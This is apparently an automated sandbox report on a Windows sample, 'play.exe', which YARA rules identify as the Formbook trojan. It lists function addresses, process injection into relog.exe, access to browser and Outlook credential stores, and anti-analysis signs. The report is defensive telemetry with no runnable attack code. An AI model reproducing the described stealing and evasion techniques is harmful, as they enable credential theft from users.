Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026868B8 0_2_026868B8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B6962 0_2_026B6962
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A29A0 0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0276A9A6 0_2_0276A9A6
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0E59 0_2_026A0E59
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275EE26 0_2_0275EE26
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275EEDB 0_2_0275EEDB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275CE93 0_2_0275CE93
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B2E90 0_2_026B2E90
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02714F40 0_2_02714F40
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02742F30 0_2_02742F30
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026E2F28 0_2_026E2F28
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C0F30 0_2_026C0F30
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02692FC8 0_2_02692FC8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271EFA0 0_2_0271EFA0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0C00 0_2_026A0C00
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02690CF2 0_2_02690CF2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02740CB5 0_2_02740CB5
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AAD00 0_2_026AAD00
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273CD1F 0_2_0273CD1F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269ADE0 0_2_0269ADE0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B8DBF 0_2_026B8DBF
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027412ED 0_2_027412ED
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BD2F0 0_2_026BD2F0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BB2C0 0_2_026BB2C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A52A0 0_2_026A52A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268D34C 0_2_0268D34C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275132D 0_2_0275132D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026E739A 0_2_026E739A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275F0E0 0_2_0275F0E0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027570E9 0_2_027570E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A70C0 0_2_026A70C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274F0CC 0_2_0274F0CC
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D516C 0_2_026D516C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268F172 0_2_0268F172
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0276B16B 0_2_0276B16B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AB1B0 0_2_026AB1B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026E5630 0_2_026E5630
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027516CC 0_2_027516CC
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275F7B0 0_2_0275F7B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02691460 0_2_02691460
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275F43F 0_2_0275F43F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02757571 0_2_02757571
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027695C3 0_2_027695C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273D5B0 0_2_0273D5B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02713A6C 0_2_02713A6C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02757A46 0_2_02757A46
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275FA49 0_2_0275FA49
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274DAC6 0_2_0274DAC6
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026E5AA0 0_2_026E5AA0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02741AA3 0_2_02741AA3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273DAAC 0_2_0273DAAC
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275FB76 0_2_0275FB76
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02715BF0 0_2_02715BF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026DDBF9 0_2_026DDBF9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BFB80 0_2_026BFB80
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270D800 0_2_0270D800
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A38E0 0_2_026A38E0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A9950 0_2_026A9950
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BB950 0_2_026BB950
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02735910 0_2_02735910
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A9EB0 0_2_026A9EB0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275FF09 0_2_0275FF09
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02663FD5 0_2_02663FD5
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02663FD2 0_2_02663FD2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275FFB1 0_2_0275FFB1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A1F92 0_2_026A1F92
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02719C32 0_2_02719C32
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275FCF2 0_2_0275FCF2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02757D73 0_2_02757D73
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A3D40 0_2_026A3D40
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02751D5A 0_2_02751D5A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BFDC0 0_2_026BFDC0
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_039706E5 4_2_039706E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_0399138F 4_2_0399138F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_0397073F 4_2_0397073F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_039726BF 4_2_039726BF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03978E1F 4_2_03978E1F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03972496 4_2_03972496
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_0397249F 4_2_0397249F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_0397AC3F 4_2_0397AC3F
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_0330A352 5_2_0330A352
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_0325E3F0 5_2_0325E3F0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_033103E6 5_2_033103E6
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_032F0274 5_2_032F0274
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_032D02C0 5_2_032D02C0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03240100 5_2_03240100
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_032EA118 5_2_032EA118
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_032D8158 5_2_032D8158
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_033041A2 5_2_033041A2
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_033101AA 5_2_033101AA
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_033081CC 5_2_033081CC
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_032E2000 5_2_032E2000
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03250770 5_2_03250770
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03274750 5_2_03274750
Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 03297E54 appears 107 times
Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 032CF290 appears 103 times
Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 0323B970 appears 262 times
Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 03285130 appears 58 times
Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 032BEA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe Code function: String function: 0268B970 appears 262 times
Source: C:\Users\user\Desktop\play.exe Code function: String function: 0270EA12 appears 86 times
Source: C:\Users\user\Desktop\play.exe Code function: String function: 026D5130 appears 58 times
Source: C:\Users\user\Desktop\play.exe Code function: String function: 0271F290 appears 103 times
Source: C:\Users\user\Desktop\play.exe Code function: String function: 026E7E54 appears 107 times
Source: play.exe, 00000000.00000002.2062190338.0000000002931000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \VarFileInfo\TranslationProductVersion\StringFileInfo\%04x%04x\%sOriginalFilename vs play.exe
Source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRelog.exej% vs play.exe
Source: play.exe, 00000000.00000003.1957582944.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe, 00000000.00000003.1959294394.00000000025E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs play.exe
Source: play.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: play.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@17/14
Source: C:\Windows\SysWOW64\relog.exe File created: C:\Users\user\AppData\Local\Temp\--x702s3
Source: play.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\play.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: relog.exe, 00000005.00000002.4103860914.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4103860914.0000000002D22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: play.exe ReversingLabs: Detection: 55%
Source: play.exe Virustotal: Detection: 58%
Source: unknown Process created: C:\Users\user\Desktop\play.exe "C:\Users\user\Desktop\play.exe"
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\play.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: pdh.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\relog.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\relog.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\relog.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: play.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: relog.pdbGCTL source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: relog.pdb source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aAqvujXSGNo.exe, 00000004.00000000.1976786977.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4103761428.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: play.exe, play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BE90CB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BE90CB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB7150 push esp; retf 0_2_00BB71BF
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB9AC0 push esp; ret 0_2_00BB9AC1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB6A13 push ds; iretd 0_2_00BB6A20
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA6BC7 push B2A749EEh; iretd 0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA6B6E push B2A749EEh; iretd 0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BADB4C push edx; iretd 0_2_00BADB4D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB6CA3 push ebp; retn A5BAh 0_2_00BB6D89
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA8DDA pushfd ; retf 0_2_00BA8E23
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BE8505 push ecx; ret 0_2_00BE8518
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA3D70 push eax; ret 0_2_00BA3D72
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA2687 push eax; ret 0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB3EE3 push FFFFFFD3h; ret 0_2_00BB3FC3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA26D1 push eax; ret 0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB4E7C push ecx; ret 0_2_00BB4E83
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA272B push eax; ret 0_2_00BA2736
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB4F7E push ebp; iretd 0_2_00BB4F82
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA276E push eax; ret 0_2_00BA2776
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0266225F pushad ; ret 0_2_026627F9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026627FA pushad ; ret 0_2_026627F9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0266283D push eax; iretd 0_2_02662858
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026909AD push ecx; mov dword ptr [esp], ecx 0_2_026909B6
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0266135F push eax; iretd 0_2_02661369
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03978BAC push esp; retf 4_2_03978C1B
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03977BCD push 0B2B29DEh; ret 4_2_03977BD2
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03969B0C push 9D5CB4DDh; retf 4_2_03969B16
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03969A00 push esp; retf 4_2_039699FF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_039699FB push esp; retf 4_2_039699FF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_0396A836 pushfd ; retf 4_2_0396A87F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_039786FF push ebp; retn A5BAh 4_2_039787E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03968623 push B2A749EEh; iretd 4_2_0396862A
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe Code function: 4_2_03977D81 push eax; ret 4_2_03977D82
Source: play.exe Static PE information: section name: .text entropy: 7.973595489277393
Source: C:\Windows\SysWOW64\relog.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\relog.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D096E rdtsc 0_2_026D096E
Source: C:\Windows\SysWOW64\relog.exe Window / User API: threadDelayed 3936
Source: C:\Windows\SysWOW64\relog.exe Window / User API: threadDelayed 6035
